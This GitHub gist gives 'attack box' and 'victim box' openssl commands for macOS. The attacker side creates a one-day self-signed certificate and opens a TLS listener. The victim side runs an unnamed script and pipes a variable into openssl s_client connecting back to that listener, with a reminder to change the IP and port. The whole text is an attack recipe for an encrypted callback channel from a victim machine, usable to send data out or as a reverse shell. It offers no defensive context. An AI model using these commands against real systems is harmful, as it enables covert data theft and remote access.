Skip to content

Instantly share code, notes, and snippets.

@PonchoSec
Last active November 1, 2022 15:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save PonchoSec/a7a8c5b330fbe68a511f6648b6c096db to your computer and use it in GitHub Desktop.
Save PonchoSec/a7a8c5b330fbe68a511f6648b6c096db to your computer and use it in GitHub Desktop.
macos_openssl_instructions
# attack box
# run first
openssl req -x509 -newkey rsa:4096 -keyout key.pem -subj "/CN=$cn\/emailAddress=admin@$cn/C=US/ST=Ohio/L=Columbus/O=Widgets Inc/OU=Some Unit" -out cert.pem -days 1 -nodes 2>/dev/null
# run second
openssl s_server -quiet -key key.pem -cert cert.pem -port 9001
# choose your own port
# victim box
# execute the ./<name>.sh script
# chmod +x name.sh
# run last
echo $p | openssl s_client -quiet -connect 127.0.0.1:9001 2>/dev/null
# change the IP address & port
@PonchoSec
Copy link
Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment